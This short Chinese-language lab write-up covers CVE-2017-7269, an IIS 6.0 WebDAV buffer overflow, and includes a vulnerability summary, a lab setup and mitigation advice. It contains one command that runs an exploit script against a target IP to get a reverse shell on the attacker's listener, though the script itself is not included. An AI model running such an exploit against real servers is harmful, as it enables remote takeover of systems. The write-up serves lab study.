在目前很多的攻防比赛中,IIS6.0仍然会出现,因此,我们再次再来和大家一起学习一波此漏洞的利用。
0X0 概述
Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269),漏洞利用PoC开始流传,但糟糕的是这产品已经停止更新了。
微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PROPFIND请求,执行任意代码。该漏洞自2016年7、8月起就已被利用。
由于开启WebDAV服务就存在该漏洞,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。
0X1:环境搭建:
Winodws Server2003,IIS开启写功能
物理机IP:192.168.1.2
靶 机 IP:172.16.1.17
0x2 漏洞利用
本地开启监听端口:
运行脚本攻击:
python iis6.0.py 172.16.1.17 80 192.168.1.24444
查看反弹:
攻击完成后,靶机的web服务就无法正常访问了!不过这个时候就已经完全控制系统了!
0X3 漏洞修复
关闭读写功能,禁止用户通过此功能写入。
发送:“IIS6.0“关键字”获取实验学习验证代码文件。